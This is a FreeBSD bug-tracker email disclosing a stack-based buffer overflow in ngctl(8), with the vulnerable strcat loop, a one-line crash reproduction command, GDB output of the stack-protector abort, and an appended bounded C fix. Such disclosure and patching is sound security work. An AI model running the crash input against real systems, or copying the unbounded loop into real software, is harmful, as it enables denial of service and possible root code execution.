Date: Tue, 10 Feb 2026 01:21:43 +0000
From: bugzilla-noreply@freebsd.org
To: bugs@FreeBSD.org
Subject: [Bug 293075] Stack-based buffer overflow in ngctl(8)
Message-ID: <bug-293075-227@https.bugs.freebsd.org/bugzilla/>
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=293075

            Bug ID: 293075
           Summary: Stack-based buffer overflow in ngctl(8)
           Product: Base System
           Version: 14.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: bin
          Assignee: bugs@FreeBSD.org
          Reporter: igor@bsdtrust.com

Created attachment 267934
  --> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=267934&action=edit
ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')

Dear FreeBSD Security Team,

I am reporting a stack-based buffer overflow in ngctl(8) that allows any user
to crash (and potentially exploit to code execution) the binary, which is
typically executed as root. I want to register a CVE for this memory
corruption vulnerability.

Vulnerability Details

File: usr.sbin/ngctl/config.c (function ConfigCmd)
Buffer: char buf[NG_TEXTRESPONSE]; → NG_TEXTRESPONSE == 1024

Vulnerable code (still present in current main branch – confirmed via
cgit.freebsd.org):

    char buf[NG_TEXTRESPONSE];

    *buf = '\0';
    for (i = 2; i < ac; i++) {
        if (i != 2)
            strcat(buf, " ");
        strcat(buf, av[i]);   /* ← NO BOUNDS CHECKING */
    }

Proof of Vulnerability (PoC + GDB)

Reproduction (any FreeBSD 13/14/15-CURRENT):

    ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')

Crash output:

    ngctl: send msg: No such file or directory
    Feb  9 18:39:10 hostname ngctl[980]: stack overflow detected; terminated
    Abort trap (core dumped)

    root@igor:~ # gdb ngctl -q
    GEF for freebsd ready, type `gef' to start, `gef config' to configure
    93 commands loaded and 5 functions added for GDB 15.1 [GDB v15.1 for FreeBSD] in 0.00ms using Python engine 3.11
    Reading symbols from ngctl...
    (No debugging symbols found in ngctl)
    gef➤ r config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ───────────────────────────────────────────────────────────────── registers ────
    $rax   : 0x0
    $rbx   : 0x000000080111e644 → "stack overflow detected; terminated"
    $rcx   : 0x00000008012152da → <getpid+000a> jb 0x801215178
    $rdx   : 0x0
    $rsp   : 0x00007fffffffcf88 → 0x00000008012188b0 → mov edi, 0x7f
    $rbp   : 0x00007fffffffcfd0 → 0x00007fffffffcfe0 → 0x00007fffffffd860 → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"
    $rsi   : 0x6
    $rdi   : 0x422
    $rip   : 0x000000080121545a → <kill+000a> jb 0x801215178
    $r8    : 0x0
    $r9    : 0x0
    $r10   : 0x0
    $r11   : 0x000000080182d4a8 → 0x0032302d00544d4c ("LMT"?)
    $r12   : 0x00000008012cb950 → 0x64a4d3bb4ddc49a0
    $r13   : 0x4
    $r14   : 0x00007fffffffcf90 → 0xffffffffffffffdf
    $r15   : 0x2
    $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
    $cs: 0x43 $ss: 0x3b $ds: 0x3b $es: 0x3b $fs: 0x13 $gs: 0x1b
    ───────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffcf88│+0x0000: 0x00000008012188b0 → mov edi, 0x7f ← $rsp
    0x00007fffffffcf90│+0x0008: 0xffffffffffffffdf ← $r14
    0x00007fffffffcf98│+0x0010: 0xffffffffffffffff
    0x00007fffffffcfa0│+0x0018: 0x0000000000000000
    0x00007fffffffcfa8│+0x0020: 0x0000000000000000
    0x00007fffffffcfb0│+0x0028: 0x0000000000000000
    0x00007fffffffcfb8│+0x0030: 0x0000000000000000
    0x00007fffffffcfc0│+0x0038: 0x00007fffffffe497 → 0x414100796d6d7564 ("dummy"?)
    ─────────────────────────────────────────────────────────────── code:x86:64 ────
       0x801215450 <kill+0000>  mov eax, 0x25
       0x801215455 <kill+0005>  mov r10, rcx
       0x801215458 <kill+0008>  syscall
     → 0x80121545a <kill+000a>  jb 0x801215178   NOT taken [Reason: !(C)]
       0x801215460 <kill+0010>  ret
       0x801215461              int3
       0x801215462              int3
       0x801215463              int3
       0x801215464              int3
    ─────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, stopped 0x80121545a in kill (), reason: SIGABRT
    ───────────────────────────────────────────────────────────────────── trace ────
    [#0] 0x80121545a → kill()
    [#1] 0x8012188b0 → mov edi, 0x7f
    [#2] 0x801218820 → __stack_chk_fail()
    [#3] 0x1026e9b → int3
    ──────────────────────

The overflow reaches the stack canary (and potentially saved return
address/ebp) → confirmed stack smash.

    root@igor:~ # uname -a
    FreeBSD igor 14.3-RELEASE FreeBSD 14.3-RELEASE releng/14.3-n271432-8c9ce319fef7 GENERIC amd64

Impact

DoS → any user with access to ngctl can crash it.
Code execution → root binary + stack overflow. SSP prevents simple ROP, but
bypasses exist (older builds, -fno-stack-protector, infoleak, etc.).
Common scenario: jails, monitoring scripts, or any system with netgraph
enabled.

I want to register a CVE for this memory corruption vulnerability.

Credits:
Author: Igor Gabriel Sousa e Souza
Email: igor@bsdtrust.com
LinkedIn: https://www.linkedin.com/in/igo0r

Thanks!

-- 
You are receiving this mail because:
You are the assignee for the bug.
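A bounded version of the argument-joining loop described in the report, added here as an illustrative fix and not code from the report or from FreeBSD's ngctl: join_args_bounded, demo_short_args and demo_oversized_args are hypothetical names, and NG_TEXTRESPONSE is redefined locally so the example builds without the netgraph headers. Rather than strcat() into a fixed buffer, it tracks the bytes used and refuses the command when the joined text would not fit, which is the behaviour a caller building a netgraph message should get instead of a smashed stack.

```c
#include <string.h>
#define NG_TEXTRESPONSE 1024	/* value from <netgraph/ng_message.h> */

/*
 * Bounded replacement for the strcat() loop in ConfigCmd(): joins av[2..ac-1]
 * with single spaces into buf[bufsz]. Returns 0 on success, -1 (buf emptied)
 * if the result would not fit; rejecting beats silently truncating a config.
 */
int join_args_bounded(char *buf, size_t bufsz, int ac, char *const av[])
{
	size_t used = 0, alen, need;
	int i;
	if (bufsz == 0)
		return (-1);
	buf[0] = '\0';
	for (i = 2; i < ac; i++) {
		alen = strlen(av[i]);
		need = alen + (i != 2 ? 1 : 0);	/* separator + argument */
		if (need > bufsz - 1 - used) {	/* keep room for the NUL */
			buf[0] = '\0';
			return (-1);
		}
		if (i != 2)
			buf[used++] = ' ';
		memcpy(buf + used, av[i], alen);
		used += alen;
		buf[used] = '\0';
	}
	return (0);
}

/* Normal-size arguments are joined exactly as the original loop would. */
int demo_short_args(void)
{
	char buf[NG_TEXTRESPONSE];
	char *const av[] = { "config", "dummy", "foo", "bar" };
	return (join_args_bounded(buf, sizeof(buf), 4, av) == 0 &&
	    strcmp(buf, "foo bar") == 0);
}

/* The report's input (two 1200-byte arguments) is refused, not overflowed. */
int demo_oversized_args(void)
{
	char buf[NG_TEXTRESPONSE], big[1201];	/* constructed crash-size input */
	char *const av[] = { "config", "dummy", big, big };
	memset(big, 'A', 1200);
	big[1200] = '\0';
	return (join_args_bounded(buf, sizeof(buf), 4, av) == -1 && buf[0] == '\0');
}
```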